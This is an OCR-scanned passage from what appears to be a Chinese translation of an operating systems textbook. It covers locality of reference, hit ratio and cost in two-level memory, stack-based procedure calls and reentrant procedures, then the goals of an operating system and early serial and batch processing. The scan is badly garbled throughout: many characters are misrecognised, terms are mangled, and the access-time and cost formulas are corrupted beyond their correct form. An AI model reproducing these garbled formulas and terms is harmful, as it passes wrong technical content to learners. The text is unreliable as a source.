locality ) 指 处 理 器 访问 最 近 使 用 过 的 存储 器 单元 的 趋势 ,例如 ， 
当 执行 一 个 循环 时 ， 处 理 器 重复 执行 相同 的 指令 集合 。 
传统 上 ， 时 间 局 部 性 是 通过 将 近来 使 用 的 指令 和 数据 值 保 
存 到 高 速 缓存 中 并 使 用 高 速 缓存 的 层次 结构 实现 的 。 空 间 局 部 
性 通常 是 使 用 较 大 的 高 速 缓存 并 将 预 取 机 制 集成 到 高 速 缓存 控 ed 
制 逻辑 中 实现 的 。 近 来 ， 人 们 已 经 进行 了 许多 研究 ， 以 优化 这 E 
些 技术 ， 从 而 达到 更 好 的 性 能 ， 但 基本 的 策略 仍 保持 不 变 。 图 1.21 Web 页 的 访问 局 部 性 


两 级 存储 器 的 操作 


在 两 级 存储 器 结构 中 也 使 用 了 局 部 性 特性 。 上 层 存储 器 (M1) 比 下 层 存储 器 (M2) 更 小 、 更 快 、 成 本 
更 高 (每 位 )，M1 用 于 临时 存储 空间 较 大 的 M2 中 的 部 分 内 容 。 当 访问 存储 器 时 ， 首 先 试图 访问 M1 中 的 项 
E, 如果 成 功 ， 就 可 以 进行 快速 访问 ， 如 果 不 成 功 ， 则 把 一 块 存储 器 单元 从 M2 中 复制 到 M1 中 ， 再 通过 M1 
进行 访问 。 由 于 局 部 性 ， 当 一 个 块 被 取 到 MI 中 时 ， 将 会 有 很 多 对 块 中 单元 的 访问 ， 从 而 加 快 整个 服务 。 

为 说 明 访问 一 项 的 平均 时 间 ， 不 仅 要 考虑 两 级 存储 器 的 速度 ， 而 且 还 包括 能 在 Mi 中 找到 给 定 引 用 的 
概率 。 为 此 有 : 





3000 jp 


访问 次 数 


T=HxT+ (1-H) x (M%+72) 
=T+ (1-H) xt ' (1.1) 
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其 中 ， 

T= ( 系统 ) 平均 访问 时 间 ， 

T.-M ( 如 高 速 缓存 、 磁 盘 高 速 缓存 ) 的 访问 时 间 ， 

T.=M2 ( 如 内 存 、 磁 盘 ) 的 访问 时 间 ， 

H-A PR (访问 可 在 M1 中 找到 的 次 数 比 )。 

图 1.15 显示 了 平均 访问 时 间 关于 命中 率 的 函数 。 可 以 看 出 ， 命 中 率 越 高 ， 总 的 平均 访问 时 间 更 接近 
M1， 而 不 是 M2。 


性 能 
下 面 讨 论 与 评价 两 级 存储 器 机 制 相关 的 一 些 参数 。 首 先 考虑 价格 ， 有 
_ CS, +C,8, (12) 
O S+S i 
其 中 ， 


C:= 两 级 存储 器 的 平均 每 位 价格 ， 

CI= 上 层 存 储 器 M1 的 平均 每 位 价格 ， 

C2= 下 层 存 储 器 M2 的 平均 每 位 价格 ， 

Si=M1 的 大 小 ， 

S2=M2 的 大 小 。 
我 们 希望 C.~C,, WE C1>>C，,，， 则 需要 Si<<S,, A 1.22 显示 了 这 种 关系 。@ 

接 下 来 考虑 访问 时 间 。 为 使 一 个 两 级 存储 器 能 够 有 重大 的 性 能 提高 ， 需 要 使 也 近似 等 于 万 =T) 
如 果 区 和 远 远 小 于 T (mi<<7 )， 则 需要 命中 率 接近 于 lo 

因此 ， 我 们 希望 M1 较 小 则 可 以 降低 价格 ， 希 望 它 较 大 则 可 以 提高 命中 率 ， 从 而 提高 性 能 。 是 否 存在 
能 使 这 两 种 需求 都 在 合理 范围 内 的 M1 的 大 小 呢 ? 我 们 可 以 通过 一 系列 子 问 题 来 回答 这 个 问题 ， 

@ 满足 性 能 要 求 需 要 多 大 的 命中 率 ? 

© 为 保证 所 需要 的 命中 率 ，M1 的 大 小 应 为 多 少 ? 

© 这 个 大 小 满足 价格 要 求 吗 ? 

考虑 值 7W/T;， 它 称 做 存 取 效率 ， 用 于 衡量 平均 存 取 时 间 CT) 与 M1 的 存 取 时 间 (Ti) 的 接近 程度 。 
根据 式 ( 1.1) 得 到 : 

7-1 (1.3) 
s 1+0-H) 


图 1.23 中 ，7TWT; 被 绘制 成 关于 命中 率 ARM, T/T 值 为 参数 。 因 此 ， 为 满足 性 能 要 求 ， 所 需要 的 
命中 率 为 0.8 到 0.9。 

现在 我 们 可 以 更 准确 地 表达 相对 存储 器 大 小 的 问题 。 对 Si<<S ， 命 中 率 为 0.8 或 更 高 就 一 定 合理 吗 ? 
这 取决 于 很 多 因素 ， 包 括 正 在 执行 软件 的 性 质 以 及 两 级 存储 器 的 设计 细节 。 当 然 ， 主 要 决定 因素 是 局 部 性 
的 程度 。 图 1.24 表现 了 局 部 性 对 命中 率 的 影响 。 显 然 ， 如 果 M1 和 M 大 小 相等 ， 则 命中 率 为 1.0: 所 有 
M2 中 的 项 也 总 是 存储 在 M1 中 。 现 在 假设 没有 局 部 性 ， 也 就 是 说 ， 访 问 是 完全 随机 的 。 在 这 种 情况 下 ， 如 
R MI 的 大 小 为 M2 的 一 半 ， 任 何 时 刻 M2 中 有 一 半 的 项 在 M1 中 ， 因 此 命中 率 为 0.5。 但 是 实际 上 ， 访 问 
中 总 是 存在 某 种 程度 的 局 部 性 ， 图 1.24 中 给 出 了 中 等 局 部 性 和 强 局 部 性 的 影响 。 

因此 ， 如 果 局 部 性 比较 强 ， 就 可 能 实现 命中 率 比 较 大 而 容量 相对 比较 小 的 上 层 存 储 器 。 例 如 ， 很 多 研 
究 表明 ， 不 论 内 存 大 小 为 多 少 ， 小 高 速 缓存 都 能 产生 0.75 以 上 的 命中 率 (例如 [ AGAR89 ]、[ PRZY88 ], 
[ STRE83 ] 和 [ SMIT82 ])。 通 常 ， 高 速 缓存 大 小 在 1K 到 128K 个 字 之 闻 都 可 以 胜任 ， 而 内 存 的 大 小 则 通 
常 在 几 吉 字 节 范围 内 。 在 考虑 虚拟 存储 器 和 磁盘 高 速 缓存 时 ， 可 以 引用 其 他 研究 来 证 实 同一 种 现象 ， 即 由 
于 局 部 性 ， 相 对 小 的 M1 可 以 产生 较 大 的 命中 率 。 


日 ”注意 两 个 轴 都 使 用 了 对 数 标 度 。 有 关 对 数 标 度 的 基本 回顾 请 参阅 位 于 WilliamStallings.com/studentSupport.html 
中 的 Computer Science Student Support Site 站 点 上 的 数据 复习 文档 。 
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图 1.23 ”访问 效率 关于 命中 率 的 函数 Cr 一 7z/Ti ) 图 1.24 ”命中 率 关 于 相对 存储 器 大 小 的 函数 


这 就 引出 前 面 所 列 的 最 后 一 个 问题 ; 两 个 存储器 的 相对 大 小 是 否 能 满足 价格 要 求 ? 回答 显然 是 肯定 的 。 
如 果 只 需要 一 个 相对 比较 小 的 上 层 存储 器 实现 较 好 的 性 能 ， 那 么 两 级 存储 器 平均 每 位 的 价格 将 接近 比较 便 
宜 的 下 层 存储 器 。 


附录 1 过程 控制 

控制 过 程 调用 和 返回 的 最 常用 的 技术 是 使 用 栈 。 本 附录 概述 了 栈 最 基本 的 特征 ， 并 给 出 了 它们 在 过 程 
控制 中 的 使 用 方法 。 l | l 
栈 的 实现 


， 栈 是 一 个 有 序 的 元 素 集合 ， 一 次 只 能 访问 一 个 元 素 ,访问 点 称 做 栈 顶 。 栈 中 的 元 素数 目 ， 或 者 说 栈 的 
长 度 是 可 变 的 。 只 可 以 在 栈 顶 添加 或 删除 数据 项 。 基 于 这 个 原因 ,， 栈 也 称 做 下 推 表 或 后 进 先 出 (LIFO) 表 。 
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栈 的 实现 需要 有 一 些 用 于 存储 栈 中 元 素 的 单元 集合 。 图 1.25 给 出 一 种 典型 的 方法 , 在 内 存 ( 或 虚拟 存储 器 ) 
中 为 栈 保留 一 块 连续 的 单元 。 大 多 数 时 候 ， 块 中 只 有 一 Ba ARM RAR, 剩余 部 分 供 栈 增长 时 使 用 。 正 
确 操 作 需 要 三 个 地 址 ， 这 些 地 址 通常 保存 在 处 理 器 寄存 器 中 。 O - 
O 栈 指针 : 包含 栈 顶 地 址 。 如 果 往 栈 中 添加 (PUSH) 或 删除 (POP) 一 项 ， 这 个 指针 减 1 或 加 1， 
以 包含 新 的 栈 顶 地 址 。 | 
@ HE: 包含 保留 块 中 最 底层 单元 的 地 址 。 当 往 一 个 窗 栈 中 梁 加 一 项 时 ， 这 是 所 用 到 的 第 一 个 单元 。 
对 一 个 空 栈 进行 POP 操作 ， 则 发 生 错 误 。 
© RAR: 包含 保留 块 中 另 一 句 ， 郧 顶端 单元 的 地 址 。 如 果 对 一 个 满 的 栈 进行 PUSH 操作 ， 则 发 生 
传统 上 ， 以 及 在 现在 的 大 多 数 机 器 中 , 栈 底 是 保留 的 栈 块 的 高 端 地 址 ,而 栈 界 限 是 低 端 地 址 。 因 此 ， 
栈 是 从 高 端 地 址 向 低 端 地 址 增长 的 。 
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寄存 器 寄存 器 
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a) 存储 器 中 的 所 有 栈 b) 寄存 器 中 的 两 个 项 元 素 
图 1.25 典型 的 栈 结构 


过 程 调用 和 返回 

管理 过 程 调用 和 返回 的 最 常用 的 技术 是 使 用 栈 。 当 处 理 器 执行 一 个 调用 时 ， 它 将 返回 地 址 放 在 栈 中 ; ， 
当 执 行 一 个 返回 时 ， 它 使 用 栈 顶 的 地 址 。 对 于 图 1.26 PHREN, M 1.27 显示 了 栈 的 使 用 情况 。 

在 过 程 调用 时 ， 通 常 还 需要 传递 参数 ， 可 以 把 它们 传递 到 寄存 器 中 。 另 一 种 可 能 的 方法 是 把 参数 保存 
在 存储 器 中 的 Call 指令 后 ， 在 这 种 情况 下 ， 参 数 后 面 必须 是 返回 单元 。 这 两 种 方法 都 有 缺陷 ， 如 果 使 用 寄 
存 器 ， 被 调用 程序 和 调用 程序 都 必须 被 写 入 ， 以 确保 正确 使 用 寄存 器 ; 而 在 存储 器 中 保存 参数 ， 则 很 难 交 
换 可 变数 目的 参数 。 

更 灵活 的 参数 传递 方法 是 栈 。 当 处 理 器 执行 一 次 调用 时 ， 不 仅 在 栈 中 保存 返回 地 址 ， 而 且 保存 传递 给 
被 调用 过 程 的 参数 。 被 调用 过 程 从 栈 中 访问 这 些 参数 ， 在 返回 前 ， 返 回 参 数 也 可 以 放 在 栈 中 返回 地 址 前 下 
面 。 为 一 次 过 程 调用 保存 的 整个 参数 集合 ， 包 括 返 回 地 址 ， 称 做 烧 帧 ( stack frame )。 

图 1.28 给 出 了 一 个 例子 ， 过 程 中 声明 了 局 部 变量 xl 和 x2， 过 程 P 调用 过 程 Q，Q 中 声明 了 局 部 赤 
量 yl 和 节 。 存 储 在 每 个 栈 帧 中 的 第 一 项 指向 前 一 和 巅 的 指针 ， 如 果 参 数 的 数量 与 长 度 是 可 变 的 ， 就 需要 用 
到 该 指针 。 第 二 项 是 相应 于 该 栈 帧 的 过 程 的 返回 点 。 最 后 ， 在 栈 辆 的 顶部 为 局 部 变量 分 配 空间 。 局 部 变量 
可 用 于 参数 传递 。 例 如 ,假设 在 P 调用 Q 时 ， 它 会 传递 一 个 参数 值 ， 该 参数 值 可 存储 在 变量 y1 中 。 因 此 ， 
在 高 级 语言 中 ，P 例 程 中 的 一 个 指令 看 起 来 会 如 下 所 示 : 

CALL Q01) 

执行 该 调用 时 ， 会 为 Q MRT HH RM (如 图 1.28b 所 示 )， 这 包含 一 个 到 P 的 栈 帧 的 指针 、 到 了 
的 返回 值 以 及 Q 的 两 个 局 部 变量 ， 其 中 一 个 被 初始 化 为 由 P 传递 的 参数 。 另 一 个 局 部 变量 ya 是 由 Q 在 计 
算 过 程 中 使 用 的 局 部 变量 。 在 栈 帧 中 包含 这 样 一 个 局 部 变量 的 目的 将 在 后 面 讨论 。 
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a) 调用 和 返回 b) 执行 顺序 





图 1.26 REE 
| 4101 | | 4101 
Gee hie 
a) 最 初 栈 中 b) CALL c) CALL d) RETURN Æ eð CALL f) RETURN 后 g) RETURN 后 
的 内 容 Procl ,后 Proc2 初次 Proc2 后 


图 1.27 使 用 栈 实现 图 1.26 PORE 
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Q:| 前 一 帧 指针 上 上 前 帧 指针 





a) P 是 活跃 的 b) P 调用 Q 
图 1.28 在 使 用 示例 过 程 P 和 Q 时 栈 帧 的 生长 

可 重 入 过 程 | 

可 重 人 过 程 是 一 个 很 有 用 的 概念 ， 特 别 是 在 同时 支持 多 用 户 的 系统 中 。 可 重信 过 程 是 指 程序 代码 的 一 
个 副本 在 同一 段 时 间 内 可 以 被 多 个 用 户 共 享 使 用 。 可 重信 有 了 两 个 重要 特征 : 程序 代码 不 能 修改 其 自身 ， 每 
个 用 户 的 局 部 数据 必须 单独 保存 。 一 个 可 重 人 过 程 可 以 被 中 断 ， 由 一 个 正在 中 断 的 程序 调用 ， 在 返回 该 过 
程 时 仍 能 正确 执行 。 在 共享 系统 中 ， TRAST ARS REESE ER TER aE Ie 
有 多 个 应 用 程序 可 以 调用 这 个 过 程 。 

因此 ， 可 重 人 过 程 必须 有 一 一 个 永久 不 变 的 部 分 ( 组 成 过 程 的 指令 ) 和 一 个 临时 部 分 (指向 调用 程序 的 
指针 以 及 指向 程序 所 使 用 的 局 部 变量 的 存储 地 址 指针 )。 过 程 的 每 个 执行 实例 称 做 激活 〈activation )， 将 执 
行 永久 部 分 的 代码 ， 但 拥有 自己 的 局 部 变量 和 参数 的 副本 。 与 特定 的 激活 相关 联 的 临时 部 分 称 做 激活 记录 
( activation record )。 


支持 可 重 人 过 程 最 方便 的 方法 是 使 用 栈 。 当 调用 一 个 可 重 人 过 程 时 ， RAEES TERA 
这 样 ， 激活 记录 就 成 为 过 程 调用 所 创建 的 栈 帆 的 一 部 分 。 


第 2 章 操作 系统 概述 


本 章 简 述 操作 系统 的 发 展 历史 。 这 个 历史 本 身 很 有 趣 且 从 中 也 可 以 大 致 了 解 操 作 系 统 的 原 
理 。 首 先 在 第 一 节 介 绍 操作 系统 的 目标 和 功能 , 然后 讲述 操作 系统 如 何 从 原始 的 批 处 理 系统 演变 
成 高 级 的 多 任务 、 多 用 户 系 统 。 本 章 的 其 余部 分 给 出 了 两 个 操作 素 统 的 历史 和 总 体 特 征 , 这 两 个 
系统 将 作为 示例 系统 贵 穿 于 本 书 。 本 章 的 所 有 内 容 将 在 后 面 作 更 深入 的 讲解 。 


21 ”操作 系统 的 目标 和 功能 


操作 系统 是 控制 应 用 程序 执行 的 程序 , 并 充当 应 用 程序 和 计算 机 硬件 之 间 的 接口 。 它 有 下 面 
三 个 目标 : 
o 方便 : 操作 系统 使 计算 机 更 易于 使 用 。 
© AM: 操作 系统 允许 以 更 有 效 的 方式 使 用 计算 机 系统 资源 。 
o 扩展 能 力 : 在 构造 操作 系统 时 ， 应 该 允许 在 不 妨碍 服务 的 前 提 下 有 效 地 开发 、 测 试 和 引 
进 新 的 系统 功能 。 
接 下 来 将 依次 介绍 操作 系统 的 这 三 个 目标 。 


2.1.1 ”作为 用 户 / 计 算 机 接口 的 操作 系统 


为 用 户 提 供应 用 的 硬件 和 软件 可 以 看 做 是 一 种 层次 结构 ， 如 图 2.1 所 示 。 应 用 程序 的 用 户 ， 
即 终端 用 户 , 通常 并 不 关心 计算 机 的 硬件 细节 。 因 此 , 终端 用 户 把 计算 机 系统 看 做 是 一 组 应 用 程 
序 。 一 个 应 用 程序 可 以 用 一 种 程序 设计 语言 描述 , 并 且 由 程 
序 员 开发 而 成 。 如 果 需 要 用 一 组 完全 负责 控制 计算 机 硬件 的 
机 器 指令 开发 应 用 程序 , 将 会 是 一 件 非 常 复杂 的 任务 。 为 简 
化 这 个 任务 , 需要 提供 一 些 系统 程序 , 其 中 一 部 分 称 做 实用 
TA, 它们 实现 了 在 创建 程序 、 管 理 文件 和 控制 W/O 设备 中 
经 常 使 用 的 功能 。 程 序 员 在 开发 应 用 程序 时 将 使 用 这 些 功 能 
提供 的 接口 ; 在 应 用 程序 运行 时 , 将 调用 这 些 实用 工具 以 实 spr 
现 特定 的 功能 。 最 重要 的 系统 程序 是 操作 系统 , 操作 系统 为 a 
程序 员 屏蔽 了 硬件 细节 , 并 为 程序 员 使 用 系统 提供 方便 的 接 
口 。 它 可 以 作为 中 介 , 使 程序 员 和 应 用 程序 更 容易 地 访问 和 
使 用 这 些 功 能 和 服务 。 图 2.1 计算 机 系统 的 层次 和 视图 
简单 地 说 ,操作 系统 通常 提供 了 以 下 几 个 方面 的 服务 : 
o 程序 开发 :操作 系统 提供 各 种 各 样 的 工具 和 服务 ， 如 编辑 器 和 调试 器 ， 用 于 帮助 程序 员 
开发 程序 。 通 常 ， 这 些 服务 以 实用 工具 程序 的 形式 出 现 ， 严 格 来 说 并 不 属于 操作 系统 核 
” 心 的 一 部 分 ; 它们 由 操作 系统 提供 ， 称 做 应 用 程序 开发 工具 。 1 
“@ 程序 运行 : 运行 一 个 程序 需要 很 多 步骤 ,包括 必须 把 指令 和 数据 载 大 到 内 存 、 ak vo 
设备 和 文件 、 准 备 其 他 一 些 资源 。 操 作 系 统 六 用户 处 理 这 些 调度 问题 。 
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@ I/O 设备 访问 : 每 个 IO 设备 的 操作 都 需要 特有 的 指令 集 或 控制 信号 ， 操 作 系统 隐藏 这 
些 细节 并 提供 了 统一 的 接口 ， 因 此 程序 员 可 以 使 用 简单 的 读 和 写 操作 访问 这 些 设备 。 
@ 文件 访问 控制 : 对 操作 系统 而 言 ， 关 于 文件 的 控制 不 仅 必须 详细 了 人 解 IO 设备 (磁盘 驱 
Shes. BEAK as ) 的 特性 ， 而 且 必 须 详细 了 解 存储 介质 中 文件 数据 的 结构 。 此 外 ， 对 

有 多 个 用 户 的 系统 ， 操 作 系 统 还 可 以 提供 保护 机 制 来 控制 对 文件 的 访问 。 

@ 系统 访问 :对 于 共享 或 公共 系统 ， 操 作 系 统 控制 对 整个 系统 的 访问 以 及 对 某 个 特殊 系统 
资源 的 访问 。 访 问 功能 模块 必须 提供 对 资源 和 数据 的 保护 ， 以 避免 未 授权 用 户 的 访问 ， 
还 必须 解决 资源 竞争 时 的 冲突 问题 。 

o 错误 检测 和 响应 ， 计 算 机 系统 运行 时 可 能 发 生 各 种 各 样 的 错误 ， 包 括 内 部 和 外 部 硬件 错 
误 ， 如 存储 器 错误 、 设 备 失 效 或 故障 ， 以 及 各 种 软件 错误 ， 如 算术 溢出 、 试 图 访问 被 禁 
止 的 存储 器 单元 、 操 作 系 统 无 法 满足 应 用 程序 的 请 求 等 。 对 每 种 情况 ， 操 作 系统 都 必须 
提供 响应 以 清除 错误 和 条件， 使 其 对 正在 运行 的 应 用 程序 影响 最 小 。 响 应 可 以 是 终止 引起 
错误 的 程序 、 重 试 操作 或 简单 地 给 应 用 程序 报告 错误 。 

@ 记 账 : 一 个 好 的 操作 系统 可 以 收集 对 各 种 资源 使 用 的 统计 信息 ， 监 控 诸 如 响应 时 间 之 类 
的 性 能 参数 。 在 任何 系统 中 ， 这 个 信息 对 于 预测 将 来 增强 功能 的 需求 以 及 调整 系统 以 提 
高 性 能 都 是 很 有 用 的 。 对 多 用 户 系统 ， 这 个 信息 还 可 用 于 记 账 。 


.2 ”作为 资源 管理 器 的 操作 系统 
一 台 计 算 机 就 是 一 组 资源 , 这 些 资源 用 于 对 数据 的 移动 、 存 储 和 处 理 , 以 及 对 这 些 功 能 的 控 
制 。 而 操作 系统 负责 管理 这 些 资 源 。 

那么 是 否 可 以 说 是 操作 系统 在 控制 数据 的 移动 、 存 储 和 处 理 呢 ? 从 某 个 角度 来 看 , 答案 是 肯 
定 的 : 通过 管理 计算 机 资源 , 操作 系统 控制 计算 机 的 基本 功能 , 但 是 这 个 控制 是 通过 一 种 不 寻常 
的 方式 来 实施 的 。 通常, 我 们 把 控制 机 制 想 象 成 在 被 控制 对 象 之 外 或 者 至 少 与 被 控制 对 象 有 一 些 
差别 和 上 距离 (例如 , 住宅 供 热 系 统 是 由 自动 调 温 器 控制 的 ， 它 完全 不 同 于 热 产 生 和 热 发 送 装置 )。 
但 是 ， 操 作 系 统 却 不 是 这 种 情况 ， 作 为 控制 机 制 ， 它 有 两 方面 不 同 之 处 : 

o 操作 系统 与 普通 的 计算 机 软件 作用 相同 ， 它 也 是 由 处 理 器 执行 的 一 段 程序 或 一 组 程序 。 

© 操作 系统 经 常会 释放 控制 ， 而 且 必 须 依赖 处 理 器 才能 恢复 控制 。 

操作 系统 实际 上 不 过 是 一 组 计算 机 程序 ,与 其 他 计算 机 程序 类 似 ,它们 都 给 处 理 器 提供 指令 ， 
主要 区 别 在 于 程序 的 意图 ,操作 系统 控制 处 理 器 使 用 其 他 系统 资源 ,并 控制 其 他 程序 的 执行 时 机 。 
但 是 , 处 理 器 为 了 做 任何 一 件 这 类 事情 ,都 必须 停止 执行 操作 系统 程序 ， 而 去 执行 其 他 程序 。 因 
此 , 这 时 操作 系统 释放 对 处 理 器 的 控制 , 让 处 理 器 去 做 其 他 一 些 有 用 的 工作 , 然后 用 足够 长 的 时 
间 恢 复 控制 权 , 让 处 理 器 准备 好 做 下 一 项 工作 。 随 着 本 章 内 容 的 深入 , 读者 将 逐渐 明白 所 有 这 些 
机 制 。 

图 2.2 显示 了 由 操作 系统 管理 的 主要 资源 。 操 作 系 统 中 有 一 部 分 在 内 存 中 ,其 中 包括 内 核 程 
FF (kernel, REK nucleus) 和 当前 正在 使 用 的 其 他 操作 系统 程序 ， 内 核 程序 包含 操作 系统 中 最 常 
使 用 的 功能 。 内 存 的 其 余部 分 包含 用 户 程 序 和 数据 , 它 的 分 配 由 操作 系统 和 处 理 器 中 的 存储 管理 
硬件 联合 控制 。 操 作 系统 决定 在 程序 运行 过 程 中 何 时 使 用 IO 设备 ， 并 控制 文件 的 访问 和 使 用 。 
处 理 器 自身 也 是 一 个 资源 , 操作 系统 必须 决定 在 运行 一 个 特定 的 用 户 程 序 时 , 可 以 分 配 多 少 处 理 
器 时 间 ， 在 多 处 理 器 系统 中 ， 这 个 决定 要 传 到 所 有 的 处 理 器 。 
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数字 照相 机 等 


图 2.2 操作 系统 作为 资源 管理 器 


2.1.3 ”操作 系统 的 易 扩 展 性 
一 个 重要 的 操作 系统 应 该 能 够 不 断 发展 ， 其 原因 如 下 : 
© 硬件 升级 和 新 型 硬件 的 出 现 : 举 一 个 例子 ， 早 期 运行 UNIX 和 Macintosh 的 处 理 器 没有 
“分 页 ”的 硬件 S ， 因 此 这 两 个 操作 系统 也 没有 使 用 分 页 机 制 ， 而 较 新 的 版 本 经 过 修改 ， 
具备 了 分 页 功能 。 同 样 ， 图 形 终端 和 页 面 式 终端 替代 了 行 滚动 终端 ， 这 也 将 影响 操作 系 
统 的 设计 ， 例 如 ， 图 形 终端 允许 用 户 通 过 屏幕 上 的 “窗口 ”同时 查看 多 个 应 用 程序 ， 这 
就 要 求 在 操作 系统 中 提供 更 复杂 的 支持 。 
@ 新 的 服务 : 为 适应 用 户 的 要 求 或 满足 系统 管理 员 的 需要 ， 需 要 扩展 操作 系统 以 提供 新 的 
服务 。 例 如 ， 如 果 发 现 用 现 有 的 工具 很 难保 持 较 好 的 性能， 操作 系统 就 必须 增加 新 的 度 
量 和 控制 工具 。 
@ 纠正 错误 : 任何 一 个 操作 系统 都 有 错误 ， 随 着 时 间 的 推移 这 些 错误 逐渐 被 发 现 并 会 引入 
相应 的 补丁 程序 。 当 然 ， 补 丁 本 身 也 可 能 会 引入 新 的 错误 。 
操作 系统 经 常 性 的 变化 对 它 的 设计 提出 一 定 的 要 求 。 一 个 非常 明确 的 观点 是 , 在 构造 系统 时 
应 该 采用 模块 化 的 结构 , 清楚 地 定义 模块 间 的 接口 ,并 备 有 说 明文 档 。 对 于 像 现代 操作 系统 这 样 
的 大 型 程序 ， 简 单 的 模块 化 是 不 够 的 [ DENN80a ]， 也 就 是 说 ,不 能 只 是 简单 地 把 程序 划分 为 模 
块 ， 还 需要 做 更 多 的 工作 。 在 本 章 的 后 续 部 分 将 继续 讨论 这 个 问题 。 


2.2 ”操作 系统 的 发 展 


了 和解 这 些 年 来 操作 系统 的 发 展 历史 , 有 助 于 理解 操作 系统 的 关键 性 设计 需求 , 也 有 助 于 理解 
现代 操作 系统 基本 特征 的 意义 。 


2.2.1 串 行 处 理 . 

对 于 早期 的 计算 机 , 从 20 世纪 40 年 代 后 期 到 20 世纪 50 年 代 中 期 , 程序 员 都 是 直接 与 计算 
机 硬件 打交道 的 , 因为 当时 还 没有 操作 系统 。 这些 机 器 都 是 在 一 个 控制 台 上 运行 的 , 控制 台 包 括 
显示 灯 、 触 发 器 、 某 种 类 型 的 输入 设备 和 打印 机 。 用 机 器 代码 编写 的 程序 通过 输入 设备 ( 如 卡片 


阅读 机 ) 载 人 计算 机 。 如 果 一 个 错误 使 得 程序 停止 , 错误 原因 由 显示 灯 指 示 。 如 果 程 序 正常 完成 ， 
输出 结果 将 出 现在 打印 机 中 。 


O 分 页 将 在 本 章 后 面 简短 讨论 ， 详 细 讨 论 请 参阅 第 7 章 。 
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这 些 早期 系统 引出 了 两 个 主要 问题 : 
@ 调度 大 多 数 装置 都 使 用 一 个 硬 拷贝 的 登记 表 预 订 机 器 时 间 。 通 常 ， 一 个 用 户 可 以 以 半 
小 时 为 单位 登记 一 段 时 间 。 有 可 能 用 户 登记 了 1 小 时 ， 而 只 用 了 45 分 钟 就 完成 了 工作 ， 
在 剩 下 的 时 间 中 计算 机 只 能 闲置 ， 这 时 就 会 导致 浪费 。 另 一 方面 ， 如 果 用 户 遇 到 一 个 问 
题 ， 没 有 在 分 配 的 时 间 内 完成 工作 ， 在 解决 这 个 问题 之 前 就 会 被 强制 停止。 
@ 准备 时 间 : 一 个 程序 称 做 作业 ， 它 可 能 包括 往 内 存 中 加 载 编译 器 和 高 级 语言 程序 (RE 
序 )， 保 存 编译 好 的 程序 〈 目标 程序 )， 然 后 加 载 目标 程序 和 公用 函数 并 链接 在 一 起 。 每 
一 步 都 可 能 包括 安装 或 拆 印 磁 带 ， 或 者 准备 卡片 组 。 如 果 在 此 期 间 发 生 了 错误 ， 用 户 只 
能 全 部 重新 开始 。 因 此 ， 在 程序 运行 前 的 准备 需要 花费 大 量 的 时 间 。 
这 种 操作 模式 称 做 捉 行 处 理 , 反映 了 用 户 必须 顺序 访问 计算 机 的 事实 。 后 来 ,为 使 串 行 处 理 
更 加 有 效 , 开发 了 各 种 各 样 的 系统 软件 工具 ， 其 中 包括 公用 函数 库 、 链 接 器 、 加 载 器 、 调 试 器 和 
VO 驱动 程序 ， 它 们 作为 公用 软件 ， 对 所 有 的 用 户 来 说 都 是 可 用 的 。 


2.2.2 ”简单 批 处 理 系 统 


早期 的 计算 机 是 非常 昂贵 的 , 同时 由 于 调度 和 准备 而 浪费 时 间 是 难以 接受 的 , 因此 最 大 限度 
地 利用 处 理 器 是 非常 重要 的 。 
为 所 高 利用 率 ， 人 们 有 了 开发 批 处 理 操作 系统 的 想法 。 第 一 个 批 处理 操 作 系统 【同时 也 是 第 
一 个 操作 系统 ) 是 20 世纪 50 年 代 中 期 由 General Motors 开发 的 ， 用 在 IBM 701 上 [ WEIZ81 ]。 
这 个 系统 随后 经 过 进一步 的 改进 , 被 很 多 IBM 用 户 在 IBM 704 中 实现 。 在 20 世纪 60 年 代 早 期 ， 
许多 厂商 为 他 们 自己 的 计算 机 系统 开发 了 批 处 理 操作 系统 ,用 于 IBM 7090/7094 计算 机 的 操作 系 
统 IBSYS 最 为 著名 ， 它 对 其 他 系统 有 着 广泛 的 影响 。 l 
简单 批 处 理 方案 的 中 心思 想 是 使 用 一 个 称 做 监控 程序 的 
软件 。 通 过 使 用 这 类 操作 系统 , 用 户 不 再 直接 访问 机 器 , AR, 
用 户 把 卡片 或 磁带 中 的 作业 提交 给 计算 机 操作 员 ,由 他 把 这 些 ueee 
作业 按 顺 序 组 织 成 一 批 , 并 将 整个 批 作业 放 在 输入 设备 上 , B 
监控 程序 使 用 。 每 个 程序 完成 处 理 后 返回 到 监控 程序 ， 同 时 ， 
监控 程序 自动 加 载 下 一 个 程序 。 | 
分 界线 一 -一 一 名 
为 了 理解 这 个 方案 如 何 工 作 ,可 以 从 以 下 两 个 角度 进行 分 
Bi: 监控 程序 角度 和 处 理 器 角度 。 
@ 监控 程序 角度 : 监控 程序 控制 事件 的 顺序 。 为 做 到 这 一 N 
点 ， 大 部 分 监控 程序 必须 总 是 处 于 内 存 中 并 且 可 以 执行 ”图 23 SRR A 
( 见 图 2.3 )， 这 部 分 称 做 常 驻 监控 程序 (resident monitor )。 其 他 部 分 包括 一 些 实用 程序 和 公用 
函数 , 它们 作为 用 户 程序 的 子 程序 , 在 需要 用 到 它们 的 作业 开始 执行 时 被 载 人 。 监 控 程 序 每 次 
从 输入 设备 (通常 是 卡片 阅读 机 或 磁带 驱动 器 ) 中 读 取 一 个 作业 。 读 入 后 ， 当 前 作业 被 放置 在 
用 户 程序 区 域 , 并 且 把 控制 权 交 给 这 个 作业 。 当 作业 完成 后 ， 它 将 控制 权 返 回 给 监控 程序 , 监 
控 程 序 立即 读 取 下 一 个 作业 。 每 个 作业 的 结果 被 发 送 到 输出 设备 (如 打印 机 ); 交付 给 用 户 。 
o 处 理 器 角度 : 从 某 个 角度 看 ， 处 理 器 执行 内 存 中 存储 的 监控 程序 中 的 指令 ， 这 些 指令 读 
入 下 一 个 作业 并 存储 到 内 存 中 的 男 一 个 部 分 。 一 旦 已 经 读 入 一 个 作业 ， 处 理 器 将 会 直到 
监控 程序 中 的 分 支 指令 ， 分 支 指令 指导 处 理 器 在 用 户 程序 的 开始 处 继续 执行 。 处 理 器 继 
而 执行 用 户 程序 中 的 指令 ， 直 到 遇 到 一 个 结束 指令 或 错误 条 件 。 不 论 哪 种 情况 都 将 导致 
处 理 器 从 监控 程序 中 取 下 一 条 指令 。 因 此 ,“ 控 制 权 交 给 作业 ”仅仅 意味 着 处 理 器 当前 取 
和 执行 的 都 是 用 户 程序 中 的 指令 ， 而 “控制 权 返 回 给 监控 程序 ”的 意思 是 处 理 器 当前 从 
监控 程序 中 取 指 令 并 执行 指令 。 






a. 


